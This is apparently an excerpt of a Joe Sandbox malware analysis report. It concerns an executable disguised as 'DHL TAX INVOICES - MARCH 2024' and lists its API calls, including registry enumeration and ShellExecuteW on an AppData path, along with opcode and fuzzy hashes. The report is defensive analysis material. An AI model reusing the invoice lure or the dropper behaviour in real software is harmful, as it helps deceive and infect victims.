                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 334405425-0
                                                            • Opcode ID: 69146f7a4753ed4937f5c766683e27070a7d5aca3c441f82957c5ca1d2fa2486
                                                            • Instruction ID: 135227bab5bbd0cb957ad13063370cb04025123e1843093ab7a3381522db9c00
                                                            • Opcode Fuzzy Hash: 69146f7a4753ed4937f5c766683e27070a7d5aca3c441f82957c5ca1d2fa2486
                                                            • Instruction Fuzzy Hash: 7D21A731900219EBCF20AFA5CE48A9E7E71BF00354F20427BF511B51E1DBBD8A81DA5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Enum$CloseOpenValue
                                                            • String ID:
                                                            • API String ID: 167947723-0
                                                            • Opcode ID: 8e5f1f37d42505646bf45595fe3bc72829f9a9c39478d6518455921b480dc65b
                                                            • Instruction ID: c7ec42ec2a5b8cbcf97019b844e04a4f9c539befeef3331d530b96059407f5ff
                                                            • Opcode Fuzzy Hash: 8e5f1f37d42505646bf45595fe3bc72829f9a9c39478d6518455921b480dc65b
                                                            • Instruction Fuzzy Hash: FCF03171A14204EBEB209F65DE8CABF767DEF80354B10843FF505B61D0DAB84D419B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401E08 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\releve,?), ref: 00401E52
                                                            Strings
                                                            • C:\Users\user\AppData\Local\releve, xrefs: 00401E3B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: ExecuteShell
                                                            • String ID: C:\Users\user\AppData\Local\releve
                                                            • API String ID: 587946157-2510609794
                                                            • Opcode ID: b293fc5002a9e8d58ec67e345afa483c654a36284cedd74e9b44580f0845c611
                                                            • Instruction ID: 7aca97ec9270bcac2266565e3bd1718053f2078ff1e9e7461c7936a93ee42730
                                                            • Opcode Fuzzy Hash: b293fc5002a9e8d58ec67e345afa483c654a36284cedd74e9b44580f0845c611
                                                            • Instruction Fuzzy Hash: 79F0C236B00100ABCB11AFB99D4AEAD33B9AB40724B244577F801F70D5DAFCC9419628
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004030E7 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 0040310C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                            • Instruction ID: 040f2acbe5348ef8c996952313d322865bd2faa87b76d8d9ba7109e69b0e4b3d
                                                            • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                            • Instruction Fuzzy Hash: 22316B30200219EBDB108F55ED84ADA3F68EB08359F20813AF905EA1D0DB79DF50DBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: 799035c5252feedebfb4d06e0759c3dcc48cc576c1d476db2c73a9b72486c9d3
                                                            • Instruction ID: a4ed2935f8c713a64b441f8b02302a8faa8aa65f3841d01997d269d515fb9b23
                                                            • Opcode Fuzzy Hash: 799035c5252feedebfb4d06e0759c3dcc48cc576c1d476db2c73a9b72486c9d3
                                                            • Instruction Fuzzy Hash: 9D119131911205EBDB10CFA0CA489AEB7B4EF44354B20843FE446B72D0D6B85A41DB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                            • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                            • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                            • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004053B0 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 004053C0
                                                              • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 0040540C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: InitializeMessageSendUninitialize
                                                            • String ID:
                                                            • API String ID: 2896919175-0
                                                            • Opcode ID: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                            • Instruction ID: fd15c1a48ffcd0bde852b119af7687a848e5b357f1d71b2c4b4b2b4c4c2fcb19
                                                            • Opcode Fuzzy Hash: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                            • Instruction Fuzzy Hash: 55F0F076645601CBD3101B54AD05B5B7268EF80781F56407EEE44A23F1CABA48428B2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406558 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                              • Part of subcall function 004064E8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                              • Part of subcall function 004064E8: wsprintfW.USER32 ref: 0040653A
                                                              • Part of subcall function 004064E8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                            • Instruction ID: 8c1a5bb66f910ccc430fc34c4425cef617f316e2833151c7c1ff8c8a0ee84b40
                                                            • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                            • Instruction Fuzzy Hash: C3E086326042206BD6105B706E0893762BC9ED8740302483EF946F2084D778DC329A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405D53 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405D57
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                            • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                            • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                            • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405D2E Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                            • Instruction ID: 62c1218995ad43f24aa052634507c0d83541fa9dca801c4eab67991220ff17ac
                                                            • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                            • Instruction Fuzzy Hash: 40D01272504520AFC2513738EF0C89BBF95EB543B17028B35FAF9A22F0DB304C568A98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405829 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040582F
                                                            • GetLastError.KERNEL32 ref: 0040583D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                            • Instruction ID: d963a2520b22da8993c1f0374a54a6368e12bf2bf52e26206a68f99a8800bbf8
